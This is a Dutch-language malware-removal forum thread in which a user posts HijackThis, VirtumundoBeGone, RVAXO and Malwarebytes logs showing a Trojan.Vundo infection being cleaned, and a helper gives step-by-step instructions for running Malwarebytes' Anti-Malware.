      O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
      O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
      O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
      O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
      O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
      O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
      O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
      O9 - Extra button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe
      O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
      O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
      O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
      O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201884219671
      O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
      O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
      O16 - DPF: {D83C1BD1-DCBB-11D4-9425-0050BF33FA6E} (CycloScopeLite Control) - http://www.cyclomedia.nl/download/components/CycloScopeLite.cab
      O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
      O22 - SharedTaskScheduler: Preloader van browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
      O22 - SharedTaskScheduler: Cache-daemon voor onderdeelcategorieën - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
      O23 - Service: Adobe LM Service - Adobe Systems - C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe
      O23 - Service: Adobe Version Cue CS2 - Adobe Systems Incorporated - C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
      O23 - Service: Apple Mobile Device - Apple, Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
      O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
      O23 - Service: Norman eLogger service 6 (eLoggerSvc6) - Norman ASA - C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
      O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
      O23 - Service: iPod-service (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
      O23 - Service: Macromedia Licensing Service - Unknown owner - C:\Program Files\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe
      O23 - Service: Nero BackItUp Scheduler 3 - Nero AG - C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
      O23 - Service: NMIndexingService - Nero AG - C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
      O23 - Service: Norman NJeeves - Unknown owner - C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
      O23 - Service: Norman ZANDA - Norman ASA - C:\Program Files\Norman\Npm\Bin\Zanda.exe
      O23 - Service: Norman Virus Control on-access component (nvcoas) - Norman ASA - C:\Program Files\Norman\Nvc\bin\nvcoas.exe
      O23 - Service: Norman Virus Control Scheduler (NVCScheduler) - Norman ASA - C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
      O23 - Service: PC Tools Auxiliary Service (sdAuxService) - PC Tools - C:\Program Files\Spyware Doctor\pctsAuxs.exe
      O23 - Service: PC Tools Security Service (sdCoreService) - PC Tools - C:\Program Files\Spyware Doctor\pctsSvc.exe
      O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe

      --
      End of file - 13113 bytes



      VBG

      [03/23/2008, 15:21:52] - VirtumundoBeGone v1.5 ( "C:\Documents and Settings\Jeroen\Bureaublad\VirtumundoBeGone.exe" )
      [03/23/2008, 15:21:54] - Detected System Information:
      [03/23/2008, 15:21:54] - Windows Version: 5.1.2600, Service Pack 2
      [03/23/2008, 15:21:54] - Current Username: Jeroen (Admin)
      [03/23/2008, 15:21:54] - Windows is in NORMAL mode.
      [03/23/2008, 15:21:54] - Searching for Browser Helper Objects:
      [03/23/2008, 15:21:54] - BHO 1: {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (AcroIEHlprObj Class)
      [03/23/2008, 15:21:54] - BHO 2: {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} ()
      [03/23/2008, 15:21:54] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:54] - Checking for HKLM\...\Winlogon\Notify\hgggffg
      [03/23/2008, 15:21:54] - Found: HKLM\...\Winlogon\Notify\hgggffg - This is probably Virtumundo.
      [03/23/2008, 15:21:54] - Assigning {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} MSEvents Object
      [03/23/2008, 15:21:54] - BHO list has been changed! Starting over...
      [03/23/2008, 15:21:54] - BHO 1: {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (AcroIEHlprObj Class)
      [03/23/2008, 15:21:54] - BHO 2: {3055295A-CCDD-44B2-9F73-D8E8E626E5C1} (MSEvents Object)
      [03/23/2008, 15:21:54] - ALERT: Found MSEvents Object!
      [03/23/2008, 15:21:54] - BHO 3: {4E138131-FDFB-42EB-B92D-2BB0975448BB} ()
      [03/23/2008, 15:21:54] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:54] - Checking for HKLM\...\Winlogon\Notify\mlljh
      [03/23/2008, 15:21:54] - Key not found: HKLM\...\Winlogon\Notify\mlljh, continuing.
      [03/23/2008, 15:21:54] - BHO 4: {53707962-6F74-2D53-2644-206D7942484F} ()
      [03/23/2008, 15:21:54] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:54] - Checking for HKLM\...\Winlogon\Notify\SDHelper
      [03/23/2008, 15:21:54] - Key not found: HKLM\...\Winlogon\Notify\SDHelper, continuing.
      [03/23/2008, 15:21:54] - BHO 5: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} (SSVHelper Class)
      [03/23/2008, 15:21:54] - BHO 6: {9030D464-4C02-4ABF-8ECC-5164760863C6} (Windows Live Aanmelden - Help)
      [03/23/2008, 15:21:54] - BHO 7: {AA58ED58-01DD-4d91-8333-CF10577473F7} (Google Toolbar Helper)
      [03/23/2008, 15:21:54] - BHO 8: {AE7CD045-E861-484f-8273-0445EE161910} (AcroIEToolbarHelper Class)
      [03/23/2008, 15:21:54] - BHO 9: {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} (Google Toolbar Notifier BHO)
      [03/23/2008, 15:21:54] - Finished Searching Browser Helper Objects
      [03/23/2008, 15:21:54] - *** Detected MSEvents Object
      [03/23/2008, 15:21:54] - Trying to remove MSEvents Object...
      [03/23/2008, 15:21:55] - Terminating Process: IEXPLORE.EXE
      [03/23/2008, 15:21:56] - Terminating Process: RUNDLL32.EXE
      [03/23/2008, 15:21:57] - Disabling Automatic Shell Restart
      [03/23/2008, 15:21:57] - Terminating Process: EXPLORER.EXE
      [03/23/2008, 15:21:58] - Suspending the NT Session Manager System Service
      [03/23/2008, 15:21:58] - Terminating Windows NT Logon/Logoff Manager
      [03/23/2008, 15:21:58] - Re-enabling Automatic Shell Restart
      [03/23/2008, 15:21:59] - File to disable: C:\WINDOWS\system32\hgggffg.dll
      [03/23/2008, 15:21:59] - Renaming C:\WINDOWS\system32\hgggffg.dll -> C:\WINDOWS\system32\hgggffg.dll.vir
      [03/23/2008, 15:21:59] - File successfully renamed!
      [03/23/2008, 15:21:59] - Removing HKLM\...\Browser Helper Objects\{3055295A-CCDD-44B2-9F73-D8E8E626E5C1}
      [03/23/2008, 15:21:59] - Removing HKCR\CLSID\{3055295A-CCDD-44B2-9F73-D8E8E626E5C1}
      [03/23/2008, 15:21:59] - Adding Kill Bit for ActiveX for GUID: {3055295A-CCDD-44B2-9F73-D8E8E626E5C1}
      [03/23/2008, 15:21:59] - Deleting ATLEvents/MSEvents Registry entries
      [03/23/2008, 15:21:59] - Removing HKLM\...\Winlogon\Notify\hgggffg
      [03/23/2008, 15:21:59] - Searching for Browser Helper Objects:
      [03/23/2008, 15:21:59] - BHO 1: {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} (AcroIEHlprObj Class)
      [03/23/2008, 15:21:59] - BHO 2: {4E138131-FDFB-42EB-B92D-2BB0975448BB} ()
      [03/23/2008, 15:21:59] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:59] - Checking for HKLM\...\Winlogon\Notify\mlljh
      [03/23/2008, 15:21:59] - Key not found: HKLM\...\Winlogon\Notify\mlljh, continuing.
      [03/23/2008, 15:21:59] - BHO 3: {53707962-6F74-2D53-2644-206D7942484F} ()
      [03/23/2008, 15:21:59] - WARNING: BHO has no default name. Checking for Winlogon reference.
      [03/23/2008, 15:21:59] - Checking for HKLM\...\Winlogon\Notify\SDHelper
      [03/23/2008, 15:21:59] - Key not found: HKLM\...\Winlogon\Notify\SDHelper, continuing.
      [03/23/2008, 15:21:59] - BHO 4: {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} (SSVHelper Class)
      [03/23/2008, 15:21:59] - BHO 5: {9030D464-4C02-4ABF-8ECC-5164760863C6} (Windows Live Aanmelden - Help)
      [03/23/2008, 15:21:59] - BHO 6: {AA58ED58-01DD-4d91-8333-CF10577473F7} (Google Toolbar Helper)
      [03/23/2008, 15:21:59] - BHO 7: {AE7CD045-E861-484f-8273-0445EE161910} (AcroIEToolbarHelper Class)
      [03/23/2008, 15:21:59] - BHO 8: {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} (Google Toolbar Notifier BHO)
      [03/23/2008, 15:21:59] - Finished Searching Browser Helper Objects
      [03/23/2008, 15:21:59] - Finishing up...
      [03/23/2008, 15:21:59] - A restart is needed.
      [03/23/2008, 15:22:07] - Attempting to Restart via STOP error (Blue Screen!)



      RVAXO log:
      ---RVAXO.exe Updated: 2008-03-21---first run---
      Uninstallers:

      Files found:
      C:\WINDOWS\system32\hgggffg.dll.vir
      C:\WINDOWS\system32\hjllm.ini2
      C:\WINDOWS\pskt.ini

      Folders Found:

      Hosts-file was reset, If you use a custom hosts file please replace it...

      --------------RVAXO.exe last run---------------
      Not deleted items:

      --------------RVAXO.exe finished----------------

      Comment


      • #4
        Download Malwarebytes' Anti-Malware op je bureaublad.
        Dubbelklik mbam-setup.exe en kies voor "Next" om de tool te installeren.
        Als de installatie voltooid is zet je vinkjes bij "Update MalwareBytes' Anti-Malware" en bij "Launch MalwareBytes' Anti-Malware".
        Druk daarna op "Finish".
        Kies in het hoofdscherm voor de tab "Scanner" en selecteer het keuzerondje "Perform full scan".
        Druk op de knop "Scan" en zorg dat al je harde schijven/partities aangevinkt staan.
        Druk dan op de knop "Start Scan".
        Wanneer de scan voltooid is klik je op OK, daarna op "Show Results" om de resultaten te zien.
        Zorg ervoor dat alles aangevinkt is, klik daarna op "Remove Selected".
        Als het programma je computer wil laten herstarten, sta je dit toe.
        Daarna opent een logje(mbam-log-XX-XX-XXXX(xx-xx-xx).txt)
        Post deze log in je volgende bericht tesamen met een nieuw logje van Hijackthis

        Comment


        • #5
          Malwarebytes' Anti-Malware 1.09
          Database versie: 524

          Scan type: Volledige Scan (A:\|C:\|E:\|F:\|G:\|H:\|)
          Objecten gescand: 196911
          Verstreken tijd: 37 minute(s), 54 second(s)

          Geheugenprocessen geïnfecteerd: 0
          Geheugenmodulen geïnfecteerd: 1
          Registersleutels geïnfecteerd: 12
          Registerwaarden geïnfecteerd: 0
          Registerdata bestanden geïnfecteerd: 2
          Mappen geïnfecteerd: 0
          Bestanden geïnfecteerd: 7

          Geheugenprocessen geïnfecteerd:
          (Geen kwaadaardige items gevonden)

          Geheugenmodulen geïnfecteerd:
          C:\WINDOWS\system32\mlljh.dll (Trojan.Vundo) -> Unloaded module successfully.

          Registersleutels geïnfecteerd:
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7260dbe4-2626-4ff2-934a-f91e5199810c} (Trojan.Vundo) -> Delete on reboot.
          HKEY_CLASSES_ROOT\CLSID\{7260dbe4-2626-4ff2-934a-f91e5199810c} (Trojan.Vundo) -> Delete on reboot.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\aoprndtws (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CURRENT_USER\Software\Microsoft\aldd (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CURRENT_USER\Software\Microsoft\affri (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CURRENT_USER\Software\Microsoft\affltid (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CLASSES_ROOT\WR (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_CURRENT_USER\Software\Microsoft\rdfa (Trojan.Vundo) -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\affltid (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\affri (Malware.Trace) -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\FCOVM (Trojan.Vundo) -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RemoveRP (Trojan.Vundo) -> Quarantined and deleted successfully.

          Registerwaarden geïnfecteerd:
          (Geen kwaadaardige items gevonden)

          Registerdata bestanden geïnfecteerd:
          HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA\Authentication Packages (Trojan.Vundo) -> Data: c:\windows\system32\mlljh.dll -> Quarantined and deleted successfully.
          HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Authentication Packages (Trojan.Vundo) -> Data: c:\windows\system32\mlljh.dll
          -> Quarantined and deleted successfully.

          Mappen geïnfecteerd:
          (Geen kwaadaardige items gevonden)

          Bestanden geïnfecteerd:
          C:\WINDOWS\system32\mlljh.dll (Trojan.Vundo) -> Delete on reboot.
          C:\WINDOWS\system32\hjllm.ini (Trojan.Vundo) -> Quarantined and deleted successfully.
          C:\WINDOWS\system32\hjllm.ini2 (Trojan.Vundo) -> Quarantined and deleted successfully.
          C:\WINDOWS\system32\xuurokys.dll (Trojan.Vundo) -> Quarantined and deleted successfully.
          C:\WINDOWS\system32\sykoruux.ini (Trojan.Vundo) -> Quarantined and deleted successfully.
          C:\Documents and Settings\Jeroen\Local Settings\Temporary Internet Files\Content.IE5\WKG9GPG6\17PHolmes[1].cmt (Trojan.Downloader) -> Quarantined and deleted successfully.
          C:\System Volume Information\_restore{4295E15E-1BA4-4688-A8CC-E5BE6D956022}\RP27\A0003363.exe (Trojan.Downloader) -> Quarantined and deleted successfully.


          HiJackThis LOG
          Logfile of Trend Micro HijackThis v2.0.0 (BETA)
          Scan saved at 18:31:29, on 23-3-2008
          Platform: Windows XP SP2 (WinNT 5.01.2600)
          Boot mode: Normal

          Running processes:
          C:\WINDOWS\System32\smss.exe
          C:\WINDOWS\system32\csrss.exe
          C:\WINDOWS\system32\winlogon.exe
          C:\WINDOWS\system32\services.exe
          C:\WINDOWS\system32\lsass.exe
          C:\WINDOWS\system32\Ati2evxx.exe
          C:\WINDOWS\system32\svchost.exe
          C:\WINDOWS\system32\svchost.exe
          C:\Program Files\Windows Defender\MsMpEng.exe
          C:\WINDOWS\System32\svchost.exe
          C:\WINDOWS\system32\Ati2evxx.exe
          C:\Program Files\Norman\Npm\Bin\eLogsvc.exe
          C:\Program Files\Norman\Npm\Bin\Zanda.exe
          C:\WINDOWS\system32\svchost.exe
          C:\WINDOWS\system32\svchost.exe
          C:\WINDOWS\system32\spoolsv.exe
          C:\Program Files\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe
          C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
          C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
          C:\Program Files\Nero\Nero8\Nero BackItUp\NBService.exe
          C:\WINDOWS\system32\svchost.exe
          C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
          C:\Program Files\Adobe\Adobe Version Cue CS2\data\database\bin\mysqld-nt.exe
          C:\Program Files\Norman\Npm\bin\NJEEVES.EXE
          C:\Program Files\Norman\Nvc\BIN\NVCSCHED.EXE
          C:\Program Files\Norman\Nvc\bin\nvcoas.exe
          C:\WINDOWS\System32\alg.exe
          C:\WINDOWS\Explorer.EXE
          C:\WINDOWS\RTHDCPL.EXE
          C:\Program Files\ATI Technologies\ATI.ACE\CLI.EXE
          C:\Program Files\Windows Defender\MSASCui.exe
          C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe
          C:\Program Files\Norman\Npm\bin\ZLH.EXE
          C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe
          C:\Program Files\Norman\Nvc\BIN\NIP.EXE
          C:\Program Files\Norman\Nvc\bin\cclaw.exe
          C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe
          C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe
          C:\WINDOWS\system32\wbem\wmiprvse.exe
          C:\Program Files\iTunes\iTunesHelper.exe
          C:\Program Files\Winamp\winampa.exe
          C:\WINDOWS\system32\Rundll32.exe
          C:\WINDOWS\system32\ctfmon.exe
          C:\Program Files\Skype\Phone\Skype.exe
          C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe
          C:\Program Files\iPod\bin\iPodService.exe
          C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe
          C:\Program Files\Messenger\msmsgs.exe
          C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\acrobat_sl.exe
          C:\Program Files\Google\Google Updater\GoogleUpdater.exe
          C:\Program Files\Common Files\Nero\Lib\NMIndexingService.exe
          C:\WINDOWS\system32\wuauclt.exe
          C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
          C:\Program Files\ATI Technologies\ATI.ACE\cli.exe
          C:\Program Files\Skype\Plugin Manager\skypePM.exe
          C:\Program Files\Mozilla Firefox\firefox.exe
          C:\Documents and Settings\Jeroen\Bureaublad\HiJackThis_v2.exe

          R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.pokerweblogs.com/
          R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
          R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
          R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
          R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
          R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Koppelingen
          F2 - REG:system.ini: UserInit=C:\WINDOWS\system32\userinit.exe
          O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Adobe Acrobat 7.0\ActiveX\AcroIEHelper.dll
          O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
          O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
          O2 - BHO: Windows Live Aanmelden - Help - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
          O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
          O2 - BHO: AcroIEToolbarHelper Class - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
          O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.1.1119.1736\swg.dll
          O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
          O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll
          O4 - HKLM\..\Run: [ATICCC] "C:\Program Files\ATI Technologies\ATI.ACE\CLIStart.exe"
          O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
          O4 - HKLM\..\Run: [SkyTel] SkyTel.EXE
          O4 - HKLM\..\Run: [Windows Defender] "C:\Program Files\Windows Defender\MSASCui.exe" -hide
          O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_05\bin\jusched.exe"
          O4 - HKLM\..\Run: [Norman ZANDA] C:\Program Files\Norman\Npm\bin\ZLH.EXE /LOAD /SPLASH
          O4 - HKLM\..\Run: [OpwareSE2] "C:\Program Files\ScanSoft\OmniPageSE2.0\OpwareSE2.exe"
          O4 - HKLM\..\Run: [Thunderbird] "C:\Program Files\Mozilla Thunderbird\thunderbird.exe"
          O4 - HKLM\..\Run: [Adobe Version Cue CS2] "C:\Program Files\Adobe\Adobe Version Cue CS2\ControlPanel\VersionCueCS2Tray.exe"
          O4 - HKLM\..\Run: [Acrobat Assistant 7.0] "C:\Program Files\Adobe\Adobe Acrobat 7.0\Distillr\Acrotray.exe"
          O4 - HKLM\..\Run: [IMJPMIG8.1] "C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE" /Spoil /RemAdvDef /Migration32
          O4 - HKLM\..\Run: [MSPY2002] C:\WINDOWS\system32\IME\PINTLGNT\ImScInst.exe /SYNC
          O4 - HKLM\..\Run: [PHIME2002ASync] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /SYNC
          O4 - HKLM\..\Run: [PHIME2002A] C:\WINDOWS\system32\IME\TINTLGNT\TINTSETP.EXE /IMEName
          O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
          O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
          O4 - HKLM\..\Run: [NeroFilterCheck] C:\Program Files\Common Files\Nero\Lib\NeroCheck.exe
          O4 - HKLM\..\Run: [NBKeyScan] "C:\Program Files\Nero\Nero8\Nero BackItUp\NBKeyScan.exe"
          O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
          O4 - HKLM\..\Run: [BMbbad6e67] Rundll32.exe "C:\WINDOWS\system32\vlwosmpj.dll",s
          O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
          O4 - HKCU\..\Run: [Skype] "C:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
          O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
          O4 - HKCU\..\Run: [LClock] C:\Program Files\LClock\LClock.exe
          O4 - HKCU\..\Run: [Vista Sidebar] C:\Program Files\Vista Sidebar\sidebar.exe
          O4 - HKCU\..\Run: [ViStart] C:\Program Files\ViStart\ViStart.exe
          O4 - HKCU\..\Run: [ViOrb] C:\Program Files\ViOrb\ViOrb.exe
          O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\Windows Live\Messenger\MsnMsgr.Exe" /background
          O4 - HKCU\..\Run: [IndxStoreSvr_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Program Files\Common Files\Nero\Lib\NMIndexStoreSvr.exe" ASO-616B5711-6DAE-4795-A05F-39A1E5104020
          O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
          O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Lokale service')
          O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Netwerkservice')
          O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
          O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
          O4 - Global Startup: Adobe Acrobat Speed Launcher.lnk = ?
          O4 - Global Startup: Adobe Gamma.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
          O4 - Global Startup: Google Updater.lnk = C:\Program Files\Google\Google Updater\GoogleUpdater.exe
          O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
          O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
          O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
          O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
          O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
          O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
          O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html
          O8 - Extra context menu item: Convert to existing PDF - res://C:\Program Files\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html
          O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
          O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
          O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_05\bin\ssv.dll
          O9 - Extra button: PokerStars - {3AD14F0C-ED16-4e43-B6D8-661B03F6A1EF} - C:\Program Files\PokerStars\PokerStarsUpdate.exe
          O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
          O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
          O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
          O16 - DPF: {6E32070A-766D-4EE6-879C-DC1FA91D2FC3} (MUWebControl Class) - http://www.update.microsoft.com/microsoftupdate/v6/V5Controls/en/x86/client/muweb_site.cab?1201884219671
          O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
          O16 - DPF: {D821DC4A-0814-435E-9820-661C543A4679} (CRLDownloadWrapper Class) - http://drmlicense.one.microsoft.com/crlupdate/en/crlocx.ocx
          O16 - DPF: {D83C1BD1-DCBB-11D4-9425-0050BF33FA6E} (CycloScopeLite Control) - http://www.cyclomedia.nl/download/components/CycloScopeLite.cab
          O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL
          O22 - SharedTaskScheduler: Preloader van browseui - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
